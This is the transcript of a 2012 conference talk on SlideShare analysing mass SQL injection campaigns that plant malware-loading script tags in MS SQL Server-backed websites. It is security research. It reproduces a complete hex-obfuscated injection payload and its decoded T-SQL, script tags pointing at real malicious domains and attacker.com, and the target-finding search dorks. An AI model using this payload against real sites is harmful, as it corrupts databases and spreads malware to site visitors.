Analysis of mass SQL injection attacks
Upcoming SlideShare
Loading in...5
×
 

Analysis of mass SQL injection attacks

on

  • 3,209 views

These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

Statistics

Views

Total Views
3,209
Views on SlideShare
3,197
Embed Views
12

Actions

Likes
3
Downloads
37
Comments
0

1 Embed 12

http://irc.zempirians.com 12

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Analysis of mass SQL injection attacks Analysis of mass SQL injection attacks Presentation Transcript

  • Analysis of mass SQL injection attacks Miroslav Štampar (dev@sqlmap.org)
  • FUD (Fear, Uncertainty, Doubt) “A new virus is making the rounds and is wreaking havoc on the Internet” “Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data” “Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else” “...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2
  • Google is (not) your friend (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 3
  • Google is (not) your friend (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 4
  • Google is (not) your friend (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 5
  • Whats it all about? Platform dependent (IIS/ASP(.NET)) DBMS dependent (Microsoft SQL Server) Highly automated (tool-based) approach Popular SQL enumeration tools with or without Google search capability dont count (e.g. sqlmap, Havij, Pangolin) Infection(s) counting in thousands of domains (not millions as previously believed) Dummy as it can be (usually one request per target) In short: malware distributionFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 6
  • Modus operandi Get hands on couple of 1-day exploits Blindly inject SQL payload carrying malicious content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers Leverage exploit(s) and/or users lack of technical knowledge to install malware (spyware, trojans, etc.) to visitors computer Profit(???) - (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 7
  • Sample leveraged exploits  CVE-2012-4681 Oracle Java 7 Update 6  CVE-2012-1889 Microsoft XML Core Services  CVE-2012-1723 Java Runtime Environment  CVE-2012-0507 Java Runtime Environment  CVE-2011-3544 Java Runtime Environment  CVE-2011-2110 Adobe Flash Player  CVE-2011-0611 Adobe Flash Player  CVE-2010-3552 New Java Plug-in  CVE-2010-0188 Adobe Reader  etc.FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 8
  • Notable members (1) Lilupophilupop (sl.php)  "></title><script src="http://lilupophilupop.com/sl.php"></script><!-- Nikjju (r.php)  <script src=http://nikjju.com/r.php></script> Robint (u.js)  <script src=http://ww.robint.us/u.js></script> LizaMoon (ur.php)  </title><script src=http://lizamoon.com/ur.php></script> Jjghui (urchin.js)  </title><script src=http://jjghui.com/urchin.js></script>FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 9
  • Notable members (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 10
  • Notable members (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 11
  • Generic payload (obfuscated)GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 12
  • Generic payload (decoded)DECLARE @t VARCHAR(255), @c VARCHAR(255)DECLARE table_cursor CURSOR FORSELECT a.name, b.name FROM sysobjects a,syscolumns b WHEREa.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 orb.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR,VARCHAR */OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@cWHILE(@@FETCH_STATUS=0) BEGINEXEC(UPDATE [+@t+] SET [+@c+]=RTRIM(CONVERT(VARCHAR,[+@c+]))+<scriptsrc=http://www.attacker.com/malicious.js></script>)FETCH NEXT FROM table_cursor INTO @t,@cENDCLOSE table_cursorDEALLOCATE table_cursorFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 13
  • Analysis (1) Piggy backing (stacked) SQL injection Obfuscated SQL code (hex encoded) Decoded code dynamically executed with T- SQL EXEC command Usage of cursor for update Iterating over all tables / all text-like columns Appending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statementFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 14
  • Analysis (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 15
  • Analysis (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 16
  • Example (1) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 17
  • Example (2) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 18
  • Example (3) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 19
  • Example (4) – CLUSTER FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 20
  • Example (5) - SUCCESSFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 21
  • Example (6) - SUCCESSFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 22
  • Asprox (1) Spam botnet used for phishing scams (>10K bots) Developed over years Interesting update “msscntr32.exe” (SQL attack tool) Google search for targets (e.g. inurl:".asp") Launch SQL injection attacks against resulting pagesFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 23
  • Asprox (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 24
  • CLI (1) Standalone executable Rare beast (Chinese underground forums?) Google search for targets (e.g.: inurl:".asp" inurl:"a=") Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></s cript>) Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp? SN=...)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 25
  • CLI (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 26
  • Sample tool (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 27
  • Sample tool (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 28
  • Sample tool (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 29
  • Sample tool (4)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 30
  • Sample tool (5)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 31
  • Sample run (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 32
  • Sample run (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 33
  • Sample run (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 34
  • Sample run (4)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 35
  • Sample run (5)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 36
  • Sample run (6)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 37
  • Sample run (7)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 38
  • Sample run (8)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 39
  • Questions?FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 40